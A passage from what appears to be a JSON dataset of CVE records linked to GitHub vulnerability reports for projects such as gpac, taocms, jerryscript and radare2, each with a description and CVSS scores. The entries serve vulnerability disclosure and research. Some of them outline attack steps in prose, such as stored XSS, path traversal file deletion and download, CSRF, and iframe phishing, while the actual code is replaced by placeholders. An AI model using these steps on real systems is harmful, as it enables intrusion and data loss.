  74520. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1961",
  74521. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1961",
  74522. "Repo_new": "gpac/gpac",
  74523. "Issue_Created_At": "2021-12-10T09:26:26Z",
  74524. "description": "Null Pointer Dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG gdb CODETAG",
  74525. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74526. "severity": "MEDIUM",
  74527. "baseScore": 5.5,
  74528. "impactScore": 3.6,
  74529. "exploitabilityScore": 1.8
  74530. },
  74531. {
  74532. "CVE_ID": "CVE-2021-44927",
  74533. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1960",
  74534. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1960",
  74535. "Repo_new": "gpac/gpac",
  74536. "Issue_Created_At": "2021-12-10T08:38:06Z",
  74537. "description": "Null Pointer Dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG gdb CODETAG",
  74538. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74539. "severity": "MEDIUM",
  74540. "baseScore": 5.5,
  74541. "impactScore": 3.6,
  74542. "exploitabilityScore": 1.8
  74543. },
  74544. {
  74545. "CVE_ID": "CVE-2021-44935",
  74546. "Issue_Url_old": "https://github.com/glFusion/glfusion/issues/482",
  74547. "Issue_Url_new": "https://github.com/glfusion/glfusion/issues/482",
  74548. "Repo_new": "glfusion/glfusion",
  74549. "Issue_Created_At": "2021-12-08T08:13:57Z",
  74550. "description": "Arbitrary user impersonation vulnerability. In the article comments\uff0cWe can impersonate any user to APITAG can even impersonate a system administrator FILETAG FILETAG )",
  74551. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  74552. "severity": "CRITICAL",
  74553. "baseScore": 9.1,
  74554. "impactScore": 5.2,
  74555. "exploitabilityScore": 3.9
  74556. },
  74557. {
  74558. "CVE_ID": "CVE-2021-44937",
  74559. "Issue_Url_old": "https://github.com/glFusion/glfusion/issues/485",
  74560. "Issue_Url_new": "https://github.com/glfusion/glfusion/issues/485",
  74561. "Repo_new": "glfusion/glfusion",
  74562. "Issue_Created_At": "2021-12-09T06:17:55Z",
  74563. "description": "APITAG CMS NUMBERTAG Arbitrary user registration vulnerability. There is a logical problem with the user registration page After clicking the register button, the user does not need to confirm the email. The system directly saves the submitted content in the database. This leads to a problem. An attacker can register with the mailbox of any user. When users want to register, they will find that the mailbox has been occupied. FILETAG",
  74564. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  74565. "severity": "MEDIUM",
  74566. "baseScore": 5.3,
  74567. "impactScore": 1.4,
  74568. "exploitabilityScore": 3.9
  74569. },
  74570. {
  74571. "CVE_ID": "CVE-2021-44942",
  74572. "Issue_Url_old": "https://github.com/glFusion/glfusion/issues/486",
  74573. "Issue_Url_new": "https://github.com/glfusion/glfusion/issues/486",
  74574. "Repo_new": "glfusion/glfusion",
  74575. "Issue_Created_At": "2021-12-09T07:11:09Z",
  74576. "description": "APITAG CMS NUMBERTAG FILETAG CSRF vulnerability. Attackers can construct blacklist IP addresses. Using the CSRF vulnerability to trick the administrator to click, can add a blacklist poc CODETAG FILETAG FILETAG",
  74577. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
  74578. "severity": "MEDIUM",
  74579. "baseScore": 4.3,
  74580. "impactScore": 1.4,
  74581. "exploitabilityScore": 2.8
  74582. },
  74583. {
  74584. "CVE_ID": "CVE-2021-44949",
  74585. "Issue_Url_old": "https://github.com/glFusion/glfusion/issues/487",
  74586. "Issue_Url_new": "https://github.com/glfusion/glfusion/issues/487",
  74587. "Repo_new": "glfusion/glfusion",
  74588. "Issue_Created_At": "2021-12-09T10:12:28Z",
  74589. "description": "APITAG CMS NUMBERTAG user Login denied vulnerability. We can get username on this link: APITAG FILETAG So, attacker can get all username . Then they can always log in to all users with the wrong password, which will prevent all users from logging in to the website normally. FILETAG There are two solutions NUMBERTAG set the verification code on the login page NUMBERTAG The second is to display the user's nickname instead of the login name",
  74590. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  74591. "severity": "CRITICAL",
  74592. "baseScore": 9.8,
  74593. "impactScore": 5.9,
  74594. "exploitabilityScore": 3.9
  74595. },
  74596. {
  74597. "CVE_ID": "CVE-2021-44956",
  74598. "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/43",
  74599. "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/43",
  74600. "Repo_new": "rockcarry/ffjpeg",
  74601. "Issue_Created_At": "2021-06-23T19:48:31Z",
  74602. "description": "Heap buffer overflows in APITAG at APITAG and NUMBERTAG Describe Two Heap buffer overflows were discovered in ffjpeg. The issues are being triggered in function jfif_decode at APITAG and NUMBERTAG Found by Cem Onat Karagun of Diesec System info OS version : Ubuntu NUMBERTAG ffjpeg Version : master NUMBERTAG fa4cf8a NUMBERTAG URLTAG Reproduce Compile ffjpeg with address sanitizer. APITAG POC Files: FILETAG FILETAG Run POCs with the commands below. APITAG Asan output NUMBERTAG ERRORTAG Asan output NUMBERTAG ERRORTAG",
  74603. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74604. "severity": "MEDIUM",
  74605. "baseScore": 6.5,
  74606. "impactScore": 3.6,
  74607. "exploitabilityScore": 2.8
  74608. },
  74609. {
  74610. "CVE_ID": "CVE-2021-44957",
  74611. "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/44",
  74612. "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/44",
  74613. "Repo_new": "rockcarry/ffjpeg",
  74614. "Issue_Created_At": "2021-06-23T19:51:49Z",
  74615. "description": "global buffer overflow in function jfif_encode at APITAG Describe A global buffer overflow was discovered in ffjpeg. The issue is being triggered in function jfif_encode at APITAG Found by Cem Onat Karagun of Diesec System info OS version : Ubuntu NUMBERTAG ffjpeg Version : master NUMBERTAG fa4cf8a NUMBERTAG URLTAG Reproduce Compile ffjpeg with address sanitizer. APITAG APITAG file: FILETAG Run with the following command. APITAG Asan output: ERRORTAG APITAG",
  74616. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74617. "severity": "MEDIUM",
  74618. "baseScore": 6.5,
  74619. "impactScore": 3.6,
  74620. "exploitabilityScore": 2.8
  74621. },
  74622. {
  74623. "CVE_ID": "CVE-2021-44960",
  74624. "Issue_Url_old": "https://github.com/svgpp/svgpp/issues/101",
  74625. "Issue_Url_new": "https://github.com/svgpp/svgpp/issues/101",
  74626. "Repo_new": "svgpp/svgpp",
  74627. "Issue_Created_At": "2021-12-06T16:55:10Z",
  74628. "description": "New vulnerability. FILETAG APITAG The APITAG function in the APITAG function handled the APITAG object improperly, returning a null pointer in advance at the second if, resulting in a null pointer reference behind the APITAG function. APITAG APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG d NUMBERTAG e bp NUMBERTAG fffc6d NUMBERTAG dd0 sp NUMBERTAG fffc6d NUMBERTAG T0) APITAG signal is caused by a READ memory access. APITAG address points to the zero page NUMBERTAG d NUMBERTAG e in APITAG const PATHTAG NUMBERTAG d NUMBERTAG e in APITAG const APITAG const ) PATHTAG NUMBERTAG d NUMBERTAG e in bool APITAG APITAG APITAG double, svgpp::tag::length_units::mm> const> >, APITAG >, APITAG APITAG APITAG APITAG APITAG >, APITAG >, APITAG >, APITAG APITAG APITAG APITAG const , Canvas, APITAG const const&, Canvas&, svgpp::tag::element::svg) PATHTAG NUMBERTAG d NUMBERTAG e in bool APITAG APITAG APITAG double, svgpp::tag::length_units::mm> const> >, APITAG >, APITAG APITAG APITAG APITAG APITAG >, APITAG >, APITAG >, APITAG APITAG APITAG APITAG const , APITAG const const&, Canvas&) PATHTAG NUMBERTAG d NUMBERTAG e in APITAG APITAG PATHTAG NUMBERTAG d8b NUMBERTAG in main PATHTAG NUMBERTAG fb2c6bd3d NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG bc9 in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG in APITAG const NUMBERTAG ABORTING APITAG",
  74629. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74630. "severity": "MEDIUM",
  74631. "baseScore": 6.5,
  74632. "impactScore": 3.6,
  74633. "exploitabilityScore": 2.8
  74634. },
  74635. {
  74636. "CVE_ID": "CVE-2021-44969",
  74637. "Issue_Url_old": "https://github.com/taogogo/taocms/issues/9",
  74638. "Issue_Url_new": "https://github.com/taogogo/taocms/issues/9",
  74639. "Repo_new": "taogogo/taocms",
  74640. "Issue_Created_At": "2021-12-09T12:19:43Z",
  74641. "description": "There is a storage type cross site scripting attack at APITAG APITAG administrator authority) . First, we enter the background and use the column administrator admin we created: FILETAG Let's click \"add article\" on the left: FILETAG Insert xss payload at the title \uff1a APITAG APITAG Return to the background management APITAG click \"edit article\" on the left: FILETAG Come back to the front APITAG it is the title of the article, the front desk is also affected FILETAG",
  74642. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  74643. "severity": "MEDIUM",
  74644. "baseScore": 4.8,
  74645. "impactScore": 2.7,
  74646. "exploitabilityScore": 1.7
  74647. },
  74648. {
  74649. "CVE_ID": "CVE-2021-44974",
  74650. "Issue_Url_old": "https://github.com/radareorg/radare2/issues/19478",
  74651. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/19478",
  74652. "Repo_new": "radareorg/radare2",
  74653. "Issue_Created_At": "2021-12-07T22:50:34Z",
  74654. "description": "NULL pointer dereference in APITAG . NULL pointer dereference in APITAG I have discovered a NULL / Invalid pointer dereference bug, that gets triggered while parsing the symbols of a binary. Environment ERRORTAG ASAN Stack Trace from an ASAN build while triggering the bug ERRORTAG APITAG symbols ERRORTAG APITAG array, is an array of symbols for an object of the file that is being loaded for analysis. In case were the pointer APITAG APITAG APITAG APITAG sym variable will be set to APITAG APITAG bf ERRORTAG APITAG ` I would highly appreciate if that bug qualifies for a CVE for you to request it for me. FILETAG",
  74655. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74656. "severity": "MEDIUM",
  74657. "baseScore": 5.5,
  74658. "impactScore": 3.6,
  74659. "exploitabilityScore": 1.8
  74660. },
  74661. {
  74662. "CVE_ID": "CVE-2021-44975",
  74663. "Issue_Url_old": "https://github.com/radareorg/radare2/issues/19476",
  74664. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/19476",
  74665. "Repo_new": "radareorg/radare2",
  74666. "Issue_Created_At": "2021-12-07T21:05:25Z",
  74667. "description": "Heap buffer overflow in function objc_build_refs while parsing mach o files.. Heap Buffer overflow in objc_build_refs I have discovered a heap buffer overflow while parsing mach o executables. Please refer bellow for further information. Environment CODETAG ASAN Stack Trace from an ASAN build while triggering the bug ERRORTAG APITAG APITAG ERRORTAG APITAG and APITAG theres an attempt to sanitize the APITAG variable as it has to be done. Based on the return value of the two macros which is stored in the maxsize ERRORTAG buf ERRORTAG APITAG variable instead of the maxsize one. In case where the APITAG is greater than the maxsize APITAG maxsize ERRORTAG APITAG to be called with the variable maxsize instead of the APITAG ERRORTAG APITAG ` I would highly appreciate if that bug qualifies for a CVE for you to request it for me.",
  74668. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74669. "severity": "MEDIUM",
  74670. "baseScore": 5.5,
  74671. "impactScore": 3.6,
  74672. "exploitabilityScore": 1.8
  74673. },
  74674. {
  74675. "CVE_ID": "CVE-2021-44981",
  74676. "Issue_Url_old": "https://github.com/QuickBox/QB/issues/202",
  74677. "Issue_Url_new": "https://github.com/quickbox/qb/issues/202",
  74678. "Repo_new": "quickbox/qb",
  74679. "Issue_Created_At": "2021-12-09T10:22:21Z",
  74680. "description": "Responsible disclosure policy. Hey there! I belong to an open source security research community, and a member ( APITAG has found an issue, but doesn\u2019t know the best way to disclose it. If not a hassle, might you kindly add a APITAG file with an email, or another contact method? APITAG recommends URLTAG this best practice to ensure security issues are responsibly disclosed, and it would serve as a simple instruction for security researchers in the future. Thank you for your consideration, and I look forward to hearing from you! (cc APITAG helper)",
  74681. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  74682. "severity": "HIGH",
  74683. "baseScore": 8.8,
  74684. "impactScore": 5.9,
  74685. "exploitabilityScore": 2.8
  74686. },
  74687. {
  74688. "CVE_ID": "CVE-2021-44983",
  74689. "Issue_Url_old": "https://github.com/taogogo/taocms/issues/10",
  74690. "Issue_Url_new": "https://github.com/taogogo/taocms/issues/10",
  74691. "Repo_new": "taogogo/taocms",
  74692. "Issue_Created_At": "2021-12-10T02:25:30Z",
  74693. "description": "There is a Arbitrary file download attack at \" File Management column\"(administrator authority). First, we enter the background and use the administrator admin we created: FILETAG Let's click \"file management\" on the left: FILETAG Then use Burp Suite and click Download to grab the request package FILETAG FILETAG Changing the \u201cpath\u201d parameter FILETAG",
  74694. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
  74695. "severity": "MEDIUM",
  74696. "baseScore": 4.9,
  74697. "impactScore": 3.6,
  74698. "exploitabilityScore": 1.2
  74699. },
  74700. {
  74701. "CVE_ID": "CVE-2021-44988",
  74702. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4890",
  74703. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4890",
  74704. "Repo_new": "jerryscript-project/jerryscript",
  74705. "Issue_Created_At": "2021-12-09T14:27:01Z",
  74706. "description": "Stack overflow in ecma_lcache_lookup (ecma lcache.c). APITAG revision Commit NUMBERTAG da NUMBERTAG URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG \u200b Execution steps & Output ERRORTAG",
  74707. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  74708. "severity": "HIGH",
  74709. "baseScore": 7.8,
  74710. "impactScore": 5.9,
  74711. "exploitabilityScore": 1.8
  74712. },
  74713. {
  74714. "CVE_ID": "CVE-2021-44988",
  74715. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4891",
  74716. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4891",
  74717. "Repo_new": "jerryscript-project/jerryscript",
  74718. "Issue_Created_At": "2021-12-09T14:33:33Z",
  74719. "description": "Stack overflow in ecma_find_named_property (ecma helpers.c). APITAG revision Commit NUMBERTAG da NUMBERTAG URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Build steps ERRORTAG Test case APITAG \u200b Execution steps & Output ERRORTAG",
  74720. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  74721. "severity": "HIGH",
  74722. "baseScore": 7.8,
  74723. "impactScore": 5.9,
  74724. "exploitabilityScore": 1.8
  74725. },
  74726. {
  74727. "CVE_ID": "CVE-2021-44992",
  74728. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4875",
  74729. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4875",
  74730. "Repo_new": "jerryscript-project/jerryscript",
  74731. "Issue_Created_At": "2021-12-09T09:08:53Z",
  74732. "description": "Assertion 'ecma_object_is_typedarray (obj_p)' failed in ecma typedarray APITAG APITAG revision Commit NUMBERTAG da NUMBERTAG URLTAG Version NUMBERTAG Commit NUMBERTAG ba0d1b URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG \u200b Execution steps & Output Version NUMBERTAG ERRORTAG Version NUMBERTAG ERRORTAG `",
  74733. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74734. "severity": "MEDIUM",
  74735. "baseScore": 5.5,
  74736. "impactScore": 3.6,
  74737. "exploitabilityScore": 1.8
  74738. },
  74739. {
  74740. "CVE_ID": "CVE-2021-44993",
  74741. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4876",
  74742. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4876",
  74743. "Repo_new": "jerryscript-project/jerryscript",
  74744. "Issue_Created_At": "2021-12-09T09:48:50Z",
  74745. "description": "Assertion 'ecma_is_value_boolean (base_value)' failed in ecma_op_get_value_object_base (ecma get put value).. APITAG revision Commit NUMBERTAG da NUMBERTAG URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG \u200b Execution steps & Output version NUMBERTAG ERRORTAG",
  74746. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74747. "severity": "MEDIUM",
  74748. "baseScore": 5.5,
  74749. "impactScore": 3.6,
  74750. "exploitabilityScore": 1.8
  74751. },
  74752. {
  74753. "CVE_ID": "CVE-2021-44994",
  74754. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4894",
  74755. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4894",
  74756. "Repo_new": "jerryscript-project/jerryscript",
  74757. "Issue_Created_At": "2021-12-09T14:53:08Z",
  74758. "description": "Assertion 'JERRY_CONTEXT (jmem_heap_allocated_size NUMBERTAG failed at PATHTAG (jmem_heap_finalize NUMBERTAG APITAG commit hash APITAG Build platform Ubuntu NUMBERTAG LTS Build steps ERRORTAG poc APITAG assert log ERRORTAG",
  74759. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74760. "severity": "MEDIUM",
  74761. "baseScore": 5.5,
  74762. "impactScore": 3.6,
  74763. "exploitabilityScore": 1.8
  74764. },
  74765. {
  74766. "CVE_ID": "CVE-2021-44994",
  74767. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4895",
  74768. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4895",
  74769. "Repo_new": "jerryscript-project/jerryscript",
  74770. "Issue_Created_At": "2021-12-09T14:58:57Z",
  74771. "description": "Assertion APITAG (obj_p)' failed at ecma APITAG APITAG revision Commit NUMBERTAG da NUMBERTAG URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case javascript \u200b Execution steps & Output ERRORTAG",
  74772. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74773. "severity": "MEDIUM",
  74774. "baseScore": 5.5,
  74775. "impactScore": 3.6,
  74776. "exploitabilityScore": 1.8
  74777. },
  74778. {
  74779. "CVE_ID": "CVE-2021-45014",
  74780. "Issue_Url_old": "https://github.com/taogogo/taocms/issues/11",
  74781. "Issue_Url_new": "https://github.com/taogogo/taocms/issues/11",
  74782. "Repo_new": "taogogo/taocms",
  74783. "Issue_Created_At": "2021-12-11T13:20:17Z",
  74784. "description": "There is SQL blind injection at APITAG article\". APITAG location of the vulnerability is line NUMBERTAG in PATHTAG and the incoming sql statement in the APITAG method does not use intval to process id The location of the vulnerability is line NUMBERTAG in PATHTAG and the incoming sql statement in the APITAG method does not use intval to process id FILETAG APITAG in to the background as the default account admin. FILETAG FILETAG APITAG can see action=cms&ctrl=update&id NUMBERTAG this id is the id in the update method in the FILETAG file FILETAG FILETAG FILETAG APITAG using the APITAG tool FILETAG",
  74785. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  74786. "severity": "CRITICAL",
  74787. "baseScore": 9.8,
  74788. "impactScore": 5.9,
  74789. "exploitabilityScore": 3.9
  74790. },
  74791. {
  74792. "CVE_ID": "CVE-2021-45015",
  74793. "Issue_Url_old": "https://github.com/taogogo/taocms/issues/12",
  74794. "Issue_Url_new": "https://github.com/taogogo/taocms/issues/12",
  74795. "Repo_new": "taogogo/taocms",
  74796. "Issue_Created_At": "2021-12-11T13:39:25Z",
  74797. "description": "exist is an arbitrary file delete vulnerability. APITAG location of the vulnerability is in PATHTAG from line NUMBERTAG to line NUMBERTAG and line NUMBERTAG to determine whether the incoming folder is empty. Delete the empty folder. If it is not empty, it will not be deleted, but the incoming folder will not be deleted. File filtering.. And / although it is not possible to delete non empty folders, but you can delete any file FILETAG APITAG a new file on disk d to delete it FILETAG APITAG the background to find the file management function and find a file to delete FILETAG FILETAG FILETAG in the D drive directory and successfully deleted, it proves that you can indeed use ../ to jump to the directory to operate any file, but you need to pay attention to the folder can only delete empty folders FILETAG",
  74798. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  74799. "severity": "CRITICAL",
  74800. "baseScore": 9.1,
  74801. "impactScore": 5.2,
  74802. "exploitabilityScore": 3.9
  74803. },
  74804. {
  74805. "CVE_ID": "CVE-2021-45017",
  74806. "Issue_Url_old": "https://github.com/xwlrbh/Catfish/issues/8",
  74807. "Issue_Url_new": "https://github.com/xwlrbh/catfish/issues/8",
  74808. "Repo_new": "xwlrbh/catfish",
  74809. "Issue_Created_At": "2021-12-12T03:23:30Z",
  74810. "description": "There is a csrf vulnerability in catfish APITAG FILETAG FILETAG FILETAG",
  74811. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  74812. "severity": "HIGH",
  74813. "baseScore": 8.8,
  74814. "impactScore": 5.9,
  74815. "exploitabilityScore": 2.8
  74816. },
  74817. {
  74818. "CVE_ID": "CVE-2021-45018",
  74819. "Issue_Url_old": "https://github.com/xwlrbh/Catfish/issues/9",
  74820. "Issue_Url_new": "https://github.com/xwlrbh/catfish/issues/9",
  74821. "Repo_new": "xwlrbh/catfish",
  74822. "Issue_Created_At": "2021-12-12T03:28:22Z",
  74823. "description": "There is a stored xss vulnerability exists in catfish APITAG FILETAG FILETAG FILETAG",
  74824. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  74825. "severity": "MEDIUM",
  74826. "baseScore": 6.1,
  74827. "impactScore": 2.7,
  74828. "exploitabilityScore": 2.8
  74829. },
  74830. {
  74831. "CVE_ID": "CVE-2021-45092",
  74832. "Issue_Url_old": "https://github.com/cybelesoft/virtualui/issues/2",
  74833. "Issue_Url_new": "https://github.com/cybelesoft/virtualui/issues/2",
  74834. "Repo_new": "cybelesoft/virtualui",
  74835. "Issue_Created_At": "2021-12-13T17:17:14Z",
  74836. "description": "Vulnerability Improper Access Control. Dear Cybele Software, My name is Daniel Morales, from the IT Security Team of ARHS Spikeseed. I recently found a functionality in Thinfinity APITAG that could allow to a malicious actor to perform social engineering attacks such as phishing via the directory FILETAG reachable by default. How it works By accessing the following payload (URL) an attacker could iframe any external website (of course, only external endpoints that allows being iframed). The impact is a good phishing. Payload The vulnerable vector is \" FILETAG \" where \"vpath=//\" is the pointer to the external site to be iframed. Vulnerable versions It has been tested in APITAG version NUMBERTAG and NUMBERTAG",
  74837. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  74838. "severity": "CRITICAL",
  74839. "baseScore": 9.8,
  74840. "impactScore": 5.9,
  74841. "exploitabilityScore": 3.9
  74842. },
  74843. {
  74844. "CVE_ID": "CVE-2021-45100",
  74845. "Issue_Url_old": "https://github.com/cifsd-team/ksmbd/issues/550",
  74846. "Issue_Url_new": "https://github.com/cifsd-team/ksmbd/issues/550",
  74847. "Repo_new": "cifsd-team/ksmbd",
  74848. "Issue_Created_At": "2021-12-15T01:44:51Z",
  74849. "description": "Plaintext connection despite encryption enabled. Hello. I am facing an error with the latest stable NUMBERTAG ersion, running on an APITAG machine. My configuration file is as follows: CODETAG Despite \"smb3 encryption\" set to yes, communications are still being made in plain text according to Wireshark. During the initial negotiation, both the client (a Windows NUMBERTAG machine running NUMBERTAG H1, compilation APITAG and the server agree on using NUMBERTAG and AES NUMBERTAG GCM: FILETAG On the the session setup request, however, the client decides to no longer flag it supports encryption, and thus request a plain text connection for unknown reasons: FILETAG Worse is, ksmbd agrees and goes on, ignoring the request to enforce encryption and just sending data on plain. The following screenshot displays a plain text ASCII message from opening a file which shouldn't be visible: FILETAG I am not sure if being made in plain text is an error on the Windows side or not, but at the very least ksmbd should probably deny connections if the user requested encryption in the settings. Attached here is a .zip file with a Wireshark log of the entire packet exchange, from the initial connection to the desconnection: FILETAG",
  74850. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  74851. "severity": "HIGH",
  74852. "baseScore": 7.5,
  74853. "impactScore": 3.6,
  74854. "exploitabilityScore": 3.9
  74855. },
  74856. {
  74857. "CVE_ID": "CVE-2021-45258",
  74858. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1970",
  74859. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1970",
  74860. "Repo_new": "gpac/gpac",
  74861. "Issue_Created_At": "2021-12-10T15:36:08Z",
  74862. "description": "Stack Overflow in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG gdb CODETAG APITAG CODETAG",
  74863. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74864. "severity": "MEDIUM",
  74865. "baseScore": 5.5,
  74866. "impactScore": 3.6,
  74867. "exploitabilityScore": 1.8
  74868. },
  74869. {
  74870. "CVE_ID": "CVE-2021-45259",
  74871. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1986",
  74872. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1986",
  74873. "Repo_new": "gpac/gpac",
  74874. "Issue_Created_At": "2021-12-14T02:57:15Z",
  74875. "description": "Invalid free in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG gdb CODETAG ERRORTAG",
  74876. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74877. "severity": "MEDIUM",
  74878. "baseScore": 5.5,
  74879. "impactScore": 3.6,
  74880. "exploitabilityScore": 1.8
  74881. },
  74882. {
  74883. "CVE_ID": "CVE-2021-45260",
  74884. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1979",
  74885. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1979",
  74886. "Repo_new": "gpac/gpac",
  74887. "Issue_Created_At": "2021-12-11T09:14:24Z",
  74888. "description": "Null Pointer Dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result poc NUMBERTAG ERRORTAG poc NUMBERTAG ERRORTAG poc NUMBERTAG ERRORTAG gdb poc NUMBERTAG CODETAG poc NUMBERTAG CODETAG poc NUMBERTAG CODETAG",
  74889. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74890. "severity": "MEDIUM",
  74891. "baseScore": 5.5,
  74892. "impactScore": 3.6,
  74893. "exploitabilityScore": 1.8
  74894. },
  74895. {
  74896. "CVE_ID": "CVE-2021-45262",
  74897. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1980",
  74898. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1980",
  74899. "Repo_new": "gpac/gpac",
  74900. "Issue_Created_At": "2021-12-11T09:14:52Z",
  74901. "description": "Invalid free in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG gdb CODETAG APITAG ERRORTAG",
  74902. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74903. "severity": "MEDIUM",
  74904. "baseScore": 5.5,
  74905. "impactScore": 3.6,
  74906. "exploitabilityScore": 1.8
  74907. },
  74908. {
  74909. "CVE_ID": "CVE-2021-45263",
  74910. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1975",
  74911. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1975",
  74912. "Repo_new": "gpac/gpac",
  74913. "Issue_Created_At": "2021-12-11T01:07:09Z",
  74914. "description": "Invalid free in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG gdb ERRORTAG APITAG ERRORTAG",
  74915. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74916. "severity": "MEDIUM",
  74917. "baseScore": 5.5,
  74918. "impactScore": 3.6,
  74919. "exploitabilityScore": 1.8
  74920. },
  74921. {
  74922. "CVE_ID": "CVE-2021-45266",
  74923. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1985",
  74924. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1985",
  74925. "Repo_new": "gpac/gpac",
  74926. "Issue_Created_At": "2021-12-14T02:40:51Z",
